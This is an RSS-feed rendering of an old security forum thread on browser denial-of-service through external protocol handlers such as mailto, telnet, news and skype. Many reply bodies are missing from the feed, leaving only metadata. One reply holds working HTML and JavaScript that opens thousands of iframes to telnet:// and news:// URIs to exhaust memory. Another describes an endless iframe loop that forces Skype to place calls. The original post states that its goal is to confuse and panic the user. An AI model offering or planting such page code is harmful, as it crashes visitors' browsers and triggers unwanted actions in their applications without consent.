Memory exhaustion via mailto tags One of the things I built was the mailto tag popup DoS located here: http://ha.ckers.org/weird/popup.html I was playing around with other ways to do this, like perhaps include things like news:// or other directives that could spawn additional resources towards the end goal of memory exhaustion or otherwise getting the user so confused that they cannot stop whatever is happening. I have a feeling there is an exploit buried in here, beyond buffer overflows, but actually through the art of confusion and user panic. http://sla.ckers.org/forum/read.php?14,56,56#msg-56 Fri, 24 May 2013 07:24:44 -0500 Phorum 5.2.15a http://sla.ckers.org/forum/read.php?14,56,31577#msg-31577 Re: Memory exhaustion via mailto tags http://sla.ckers.org/forum/read.php?14,56,31577#msg-31577 For example using iframe with src="skype:echo123?call" in infinite loop makes Skype to call there
It seems that there are certain ways for spamming using Safari and Skype URI]]> p0deje DoS Thu, 24 Sep 2009 06:00:32 -0500 http://sla.ckers.org/forum/read.php?14,56,31549#msg-31549 Re: Memory exhaustion via mailto tags http://sla.ckers.org/forum/read.php?14,56,31549#msg-31549 Maybe it also works on MacOS - I haven't been able to test.
Try it in your Safari :) combined with mailto confusion it becomes totally cool thing. Going to post it at blog.
Besides, I think there are some ways to seriously exploit external applications handler in Safari. Maybe play around with file:/// or smth like? 
<body />
<script>
    function makeFrameTelnet() {
    ifrm = document.createElement("IFRAME");
    ifrm.src = 'telnet://nonexistent.com:80';
    document.body.appendChild(ifrm);
    }
</script>
<script>
    function makeFrameNews() {
    ifrm = document.createElement("IFRAME");
    ifrm.src = 'news://nonexistent.com';
    document.body.appendChild(ifrm);
    }
</script>
<script>
    for (i=0; i < 9999; i++) {
    makeFrameTelnet()
    makeFrameNews()
    }
</script>
]]> p0deje DoS Tue, 22 Sep 2009 10:39:25 -0500 http://sla.ckers.org/forum/read.php?14,56,24116#msg-24116 Re: Memory exhaustion via mailto tags http://sla.ckers.org/forum/read.php?14,56,24116#msg-24116 RSnake, Metahuman, trev:
maybe Metahuman believed it was fixed because he's using NoScript, which has been blocking this kind of "attack" (automatic opening of external protocol URLs) for a long time.]]> ma1 DoS Sun, 17 Aug 2008 12:00:53 -0500 http://sla.ckers.org/forum/read.php?14,56,24115#msg-24115 Re: Memory exhaustion via mailto tags http://sla.ckers.org/forum/read.php?14,56,24115#msg-24115 PaPPy DoS Sun, 17 Aug 2008 11:13:03 -0500 http://sla.ckers.org/forum/read.php?14,56,24093#msg-24093 Re: Memory exhaustion via mailto tags http://sla.ckers.org/forum/read.php?14,56,24093#msg-24093 asilvermtzion DoS Fri, 15 Aug 2008 16:48:05 -0500 http://sla.ckers.org/forum/read.php?14,56,23331#msg-23331 Re: Memory exhaustion via mailto tags http://sla.ckers.org/forum/read.php?14,56,23331#msg-23331 trev DoS Thu, 03 Jul 2008 07:37:17 -0500 http://sla.ckers.org/forum/read.php?14,56,22863#msg-22863 Re: Memory exhaustion via mailto tags http://sla.ckers.org/forum/read.php?14,56,22863#msg-22863 rsnake DoS Mon, 09 Jun 2008 10:22:11 -0500 http://sla.ckers.org/forum/read.php?14,56,22227#msg-22227 Re: Memory exhaustion via mailto tags http://sla.ckers.org/forum/read.php?14,56,22227#msg-22227 Metahuman DoS Thu, 08 May 2008 08:45:00 -0500 http://sla.ckers.org/forum/read.php?14,56,21927#msg-21927 Re: Memory exhaustion via mailto tags http://sla.ckers.org/forum/read.php?14,56,21927#msg-21927
Just imagine, I'm sure you'll chuckle.]]> kefka DoS Thu, 17 Apr 2008 11:25:04 -0500 http://sla.ckers.org/forum/read.php?14,56,18098#msg-18098 Re: Memory exhaustion via mailto tags http://sla.ckers.org/forum/read.php?14,56,18098#msg-18098 rsnake DoS Sun, 09 Dec 2007 21:40:04 -0600 http://sla.ckers.org/forum/read.php?14,56,16279#msg-16279 Re: Memory exhaustion via mailto tags http://sla.ckers.org/forum/read.php?14,56,16279#msg-16279 Kyran DoS Tue, 25 Sep 2007 21:49:04 -0500 http://sla.ckers.org/forum/read.php?14,56,13194#msg-13194 Re: Memory exhaustion via mailto tags http://sla.ckers.org/forum/read.php?14,56,13194#msg-13194
If i stop the page load, Firefox hangs abit and eats up all of my CPU for a short period, but eventually it drops and gets normal.


Man, I got annoyed when i clicked the link .. (do'h) Oh well, long live the curiosity :P]]> Moccah DoS Sun, 01 Jul 2007 16:59:56 -0500 http://sla.ckers.org/forum/read.php?14,56,403#msg-403 Re: Memory exhaustion via mailto tags http://sla.ckers.org/forum/read.php?14,56,403#msg-403 rsnake DoS Sat, 02 Sep 2006 12:04:49 -0500 http://sla.ckers.org/forum/read.php?14,56,398#msg-398 Re: Memory exhaustion via mailto tags http://sla.ckers.org/forum/read.php?14,56,398#msg-398 Ambush Commander DoS Sat, 02 Sep 2006 10:59:24 -0500 http://sla.ckers.org/forum/read.php?14,56,390#msg-390 Re: Memory exhaustion via mailto tags http://sla.ckers.org/forum/read.php?14,56,390#msg-390 WhiteAcid DoS Fri, 01 Sep 2006 21:27:59 -0500 http://sla.ckers.org/forum/read.php?14,56,389#msg-389 Re: Memory exhaustion via mailto tags http://sla.ckers.org/forum/read.php?14,56,389#msg-389 rsnake DoS Fri, 01 Sep 2006 20:01:30 -0500 http://sla.ckers.org/forum/read.php?14,56,56#msg-56 Memory exhaustion via mailto tags http://sla.ckers.org/forum/read.php?14,56,56#msg-56
I was playing around with other ways to do this, like perhaps include things like news:// or other directives that could spawn additional resources towards the end goal of memory exhaustion or otherwise getting the user so confused that they cannot stop whatever is happening. I have a feeling there is an exploit buried in here, beyond buffer overflows, but actually through the art of confusion and user panic.]]> rsnake DoS Mon, 21 Aug 2006 12:24:05 -0500